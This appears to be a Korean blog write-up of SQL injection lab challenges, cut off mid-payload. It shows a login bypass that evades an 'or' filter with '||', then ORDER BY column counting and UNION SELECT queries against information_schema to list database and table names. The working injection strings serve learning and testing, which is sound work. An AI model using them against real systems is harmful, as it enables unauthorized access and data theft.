교수님 이건 아니잖아요

id : guest pw : guest admin으로 로그인해야 함을 알 수 있고, 힌트로 query를 보여주고 있다. 쿼리 select id from users where id='{$_GET["id"]}' and pw='{$_GET["pw"]}' id : admin' or 1=1# pw : 1 or이 필터링된다는 것을 알 수 있다. or대신 ||을 사용해 공격을 시도했다. id : admin' || '1'='1 pw : 1 공격을 성공할 수 있었다.

참인 쿼리 입력 ' or 1=1# 책 정보가 출력되었다. 컬럼 개수 알아내기 order by는 전체 컬럼 개수보다 더 큰 값을 입력하면 오류 발생 1' order by 1# 9개에서 오류 발생 → 컬럼 개수가 8개인 것을 알아냄 union을 사용해 인젝션 시도 DB명 알아내기 ' union select 1,2,3,4,schema_name,6,7,8 from information_schema.schemata# ' union select 1,2,3,4,database(),6,7,8 # sqli102 테이블명 알아내기 sqli102에서 테이블명 출력 ' union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=..